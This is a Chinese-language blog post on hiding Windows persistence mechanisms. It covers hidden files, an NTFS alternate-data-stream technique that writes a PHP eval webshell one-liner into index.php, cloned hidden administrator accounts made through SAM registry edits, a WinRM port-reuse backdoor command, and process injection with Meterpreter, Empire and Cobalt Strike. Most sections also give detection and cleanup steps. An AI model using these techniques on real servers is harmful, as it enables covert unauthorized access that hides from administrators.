权限维持篇—Windows权限维持–隐藏篇

文章目录

  • 权限维持篇---Windows权限维持--隐藏篇
  • 前言
  • 一、隐藏文件
  • 二、隐藏账号
  • 三、端口复用
  • 四、进程注入
  • 五、结束
  • 六、我的公众号

前言

攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。

一、隐藏文件

1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。

如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。

如何真正隐藏文件?
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。
attrib +s +a +h +r D:\test\project\test .txt
这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见。
破解隐藏文件:
打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下面的单选选择“显示隐藏的文件、文件夹和驱动器”。

2、利用ADS隐藏文件内容
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval($_POST[‘chopper’]);?^> > index.php:hidden.jpg
这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个
hidden.jpg的。

问题1:如何查看index.php:hidden.jpg内容呢?
进入文件所在目录,notepad index.php:hidden.jpg 或者 dir /r
问题2:如何删除index.php:hidden.jpg?
直接删除index.php即可

3、驱动级文件隐藏驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker
下载链接: http://www.xoslab.com/efl.html
如果你在网站目录未查找到相关文件,且系统目录存在存在以下文件:

c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys

那么你,应该是遭遇了驱动级文件隐藏。
如何清除?

1、查询服务状态: sc qc xlkfs
2、停止服务: net stop xlkfs 服务停止以后,经驱动级隐藏的文件即可显现
3、删除服务: sc delete xlkfs
4、删除系统目录下面的文件,重启系统,确认服务已经被清理了。

隐藏文件的方式还有很多,比如伪装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系
统文件很像的文件名并放在正常目录里面,很难辨别出来。
这些隐藏文件的方式早已不再是秘密,而更多的恶意程序开始实现“无文件”攻击,这种方式极难被发现。

二、隐藏账号

window 隐藏系统用户操作,CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限。

PS:CMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。
克隆账号制作过程:
1、“开始”→“运行”,输入“regedt32.exe”后回车,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”,单机右建权限,把名
叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。

2、来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,点击test$用户,
得到在右边显示的键值中的“类型”一项显示为0x3ec,找到箭头所指目录。

3、找到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EC”的F值中,保存。

4.4、分别test和“000003 EC”导出到桌面,删除test用户net user test$ /del


5、将刚才导出的两个后缀为.reg的注册表项导入注册表中。这样所谓的隐藏账户就创建好了。PS:不管你是在命令提
示符下输入net user 或者在系统用户管理界面都是看不到test$这个账户的,只有在注册表中才能看得到。
检测和清理方法:
使用D盾_web查杀工具,使用克隆账号检测功能进行查看,可检测出隐藏、克隆账号。

三、端口复用

通过端口复用来达到隐藏端口的目的,在Window下,如何实现端口复用呢?
前阵子,@Twi1ight公布了一种基于内置系统服务的端口复用后门方法,利用WinRM服务,一条命令实现端口复用后
门:
winrm set winrm/config/service @{EnableCompatibilityHttpListener=“true”}
一般开启WinRM服务作为远程管理,但还是第一次听到可以作为端口复用,一种简单容易实现的端口复用方式。假设,
攻击者已获取到administrator账号密码,连接远程WinRM服务执行命令:

当执行这条命令的同时,将在安全日志中留下痕迹,

另外,可以通过代码实现端口复用重定向,工具:https://github.com/crabkun/Switcher

四、进程注入

进程注入,一直是病毒木马的惯用手段,同时,它也是一种隐藏技术。在常见的渗透测试框架中,进程注入是怎么做的
以及我们如何通过工具排查出来?
1、meterpreter会话注入
当前权限无法获取hash值,查看目前系统进程


通过migrate将进程注入到system进程后,成功获得hash值。


Window后门排查:
通过TCPview显示已建立的TCP连接,我们可以看到异常的连接,同时,恶意软件将以绿色显示不到一秒钟,然后变成红色消失,如此循环。

2、Empire会话进程注入
通过psinject模块进行会话注入,直接输入ps选择一个SYSTEM权限的进程PID,使用进程注入模块,来获取权限。如下图:

Window后门排查:利用process monitor或者火绒剑监控进程都可以定位到注入进程。


3、Cobalt Strike进程注入
选择进程,点击inject,随后选择监听器,点击choose,即可发现Cobaltstrike弹回了目标机的一个新会话,这个会话就是成功注入到某进程的beacon。


Window后门排查:利用process monitor捕捉通信过程,有规律的请求取决于sleep设置的间隔。

五、结束

本文主要介绍了Window下的几种隐藏技术,包括隐藏文件、隐藏账号、端口复用、进程注入等方面的简单实现及其排
查技巧。仅作抛砖引玉之用,欢迎留言分享。

六、我的公众号

后续操作请持续关注哦!!!
了解更多请关注下列公众号:

权限维持篇---Windows权限维持--隐藏篇相关推荐

  1. windows常见后门隐藏和权限维持方法及排查技术

    https://xz.aliyun.com/t/4842 这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ... 常见ba ...

  2. 看完这篇 Linux 权限,通透了!

    我们在使用 Linux 的过程中,或多或少都会遇到一些关于使用者和群组的问题,比如最常见的你想要在某个路径下执行某个指令,会经常出现这个错误提示 . permission denied 反正我大概率见 ...

  3. Jenkins拾遗--第三篇(用户权限管理)

    采访过很多实用Jenkins的同学,发现Jenkins的安全是一个很薄弱的地方.很多公司用作生产部署的Jenkins安全管理都不是很规范,就更别提测试用的Jenkins了. 其实Jenkins是一个很 ...

  4. 看完这篇 Linux 权限后,通透了

    我们在使用 Linux 的过程中,或多或少都会遇到一些关于使用者和群组的问题,比如最常见的你想要在某个路径下执行某个指令,会经常出现这个错误提示 . permission denied 反正我大概率见 ...

  5. .NET Core实战项目之CMS 第七章 设计篇-用户权限极简设计全过程

    写在前面 这篇我们对用户权限进行极简设计并保留其扩展性.首先很感谢大家的阅读,前面六章我带着大家快速入门了ASP.NET Core.ASP.NET Core的启动过程源码解析及配置文件的加载过程源码解 ...

  6. springboot security 权限不足_SpringBoot 整合 SpringSecurity 之起源篇(零)

    本篇为SpringSecurity的第一篇,主要来介绍下什么是SpringSecurity,以及在springboot中如何使用它 I. 基本知识点 官方文档: https://docs.spring ...

  7. java 通用权限管理_通用权限管理设计篇(一)

    一.引言 因为做过的一些系统的权限管理的功能虽然在逐步完善,但总有些不尽人意的地方,总想抽个时间来更好的思考一下权限系统的设计. 权限系统一直以来是我们应用系统不可缺少的一个部分,若每个应用系统都重新 ...

  8. 【Linux系统】第二篇、权限管理篇

    文章目录 一.Linux下的用户 二.文件的权限 1. 文件访问者的分类 2. 文件类型和访问权限 3. 文件权限值的表示方法 三.文件访问权限的相关设置方法 1. chmod 2. chown 3. ...

  9. sharepoint 2016 学习系列篇(15)-自定义列表应用篇-(4)数据权限配置

    当数据已经录入到列表中之后,接下来,朋友们可能会想知道,有些数据,只想给某些用户看到,或者编辑,列表是否支持这样的操作. 大微软的sharepoint平台,对于用户的需求,可以说是考虑得很周全的,权限 ...

  10. Linux权限不理解?看完这篇就够用了

    Linux关于用户 Linux的用户分类 Linux用户的切换 su的使用 扩展 sudo的使用 Linux权限的概念 文件的的权限 文件的后缀名 文件权限 更改文件权限 chmod chown ch ...

最新文章

  1. php中三个数字由小到大输出,[求助][C语言求助]输入10个数字,并将这些数字由大到小排列...
  2. CI中PHP写法规范(不断更新)
  3. 怎样写 OpenStack Neutron 的 Extension (四)
  4. stract oracle,ORACLE 字符串聚合函数 strCat
  5. java跟c 的区别_【c++跟java的区别】java跟c语言的区别
  6. Postman下载与安装
  7. 【Hbase】程序批量put数据到Hbase
  8. 雪景特效制作软件JixiPix Snow Daze for Mac
  9. 二阶高通有源滤波器设计与仿真测试
  10. Oxygen XML Editor(XML编辑器)中文版
  11. 微软宣布与神州数码合作希望利用区块链技术优化金融、电子商务、娱乐等行业!
  12. 贝叶斯系列:(三)贝叶斯网络
  13. 孩子的一堆毛绒小动物
  14. 台达编码器型号含义_台达松下三菱安川等伺服编码器线用什么型号编码器电缆?...
  15. 脏读幻读不可重复读的区别
  16. 《互联网业务研发架构指南(2019)》
  17. 安全用电管理平台在博物馆安全用电管理系统的应用
  18. 【感悟】梳理心灵上的尘埃,继续向前
  19. 计算机网络——7.远程接入技术
  20. pythonturtle画图时隐藏海龟已经爬过的轨迹_编程班第四期第一阶段第六次课课下小练习--turtle海龟作图部分(一)...

热门文章

  1. 滴滴章文嵩分享大数据在城市智慧交通领域探索实践
  2. E. Array Shrinking
  3. Unity3D之FingerGestures使用
  4. java 日程日历_java编程:我要做一个提醒日程的软件,不是要用到日历和时钟么,这要不要自己编,还是可以直接同步电脑上...
  5. 响应式Web设计在跨终端广告创意中的应用
  6. 【C语言】如何优雅地进行嵌入式C开发?(万字总结)
  7. 面试拿到外包公司offer该不该去?!
  8. js标准时间转换为时间戳
  9. 【虚拟仿真】Unity3D中如何实现让3D模型显示在UI前面
  10. 如何恢复Juniper防火墙管理员密码,手把手教你